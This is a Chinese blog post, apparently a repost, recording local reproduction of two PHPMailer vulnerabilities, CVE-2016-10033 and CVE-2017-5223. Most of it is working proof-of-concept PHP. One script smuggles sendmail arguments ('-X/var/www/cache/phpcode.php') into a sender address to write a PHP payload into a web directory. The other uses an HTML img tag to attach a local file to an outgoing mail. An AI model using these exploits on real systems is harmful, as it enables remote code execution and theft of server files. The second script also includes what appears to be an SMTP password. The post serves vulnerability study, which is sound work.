今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下。
PHPMailer 命令执行漏洞(CVE-2016-10033)
漏洞编号:CVE-2016-10033
影响版本:PHPMailer< 5.2.18
漏洞级别: 高危
漏洞POC:
<?php /* PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fattacker\] Arg no. 4 == [-oQ/tmp/] Arg no. 5 == [-X/var/www/cache/phpcode.php] Arg no. 6 == [some"@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. The resulting file will contain the payload passed in the body of the msg: 09607 <<< --b1_cb4566aa51be9f090d9419163e492306 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< 09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- See the full advisory URL for details. */ // Attacker‘s input coming from untrusted source such as $_GET , $_POST etc. ?// For example from a Contact form ?$email_from = ‘"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php ?some"@email.com‘; $msg_body ?= "<?php phpinfo(); ?>"; // ------------------ ?// mail() param injection via the vulnerability in PHPMailer ?require_once(‘class.phpmailer.php‘); $mail = new PHPMailer(); // defaults to using php "mail()" ?$mail->SetFrom($email_from, ‘Client Name‘); $address = "customer_feedback@company-X.com"; $mail->AddAddress($address, "Some User"); $mail->Subject ???= "PHPMailer PoC Exploit CVE-2016-10033"; $mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { echo "Message sent!\n"; }PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
漏洞编号: CVE-2017-5223
影响版本: PHPMailer <= 5.2.21
漏洞级别: 高危
漏洞POC:根据作者的POC改了几行,使其适用于qq邮箱
<?php ?#Author:Yxlinkrequire_once(‘PHPMailerAutoload.php‘);$mail = new PHPMailer();$mail->isSMTP();$mail->Host = ‘smtp.qq.com‘; $mail->Port = 465; $mail->SMTPAuth = true; $mail->Username = xxxx@qq.com‘;$mail->Password = ‘zsuhxbmsaioxbcgaq‘;$mail->SMTPSecure = ‘ssl‘;$mail->CharSet ?= "UTF-8";$mail->Encoding = "base64"; $mail->Subject = "hello";$mail->From = "xxxx@qq.com"; ?$mail->FromName = "test"; ??$address = "xxxx@qq.com";$mail->AddAddress($address, "test"); $mail->AddAttachment(‘test.txt‘,‘test.txt‘); $mail->IsHTML(true); ?$msg="<img src=‘D:\\1.txt‘>test";$mail->msgHTML($msg); if(!$mail->Send()) { ?echo "Mailer Error: " . $mail->ErrorInfo;} else { ?echo "Message sent!";}?>
参考文章:
PHPMailer任意文件读取漏洞分析(CVE-2017-5223)http://www.freebuf.com/vuls/124820.html
PHPMailer 命令执行漏洞(CVE-2016-10033)分析 http://blog.csdn.net/wyvbboy/article/details/53969278
PHPMailer命令执行及任意文件读取漏洞
原文地址:https://www.cnblogs.com/xiaozi/p/8439864.html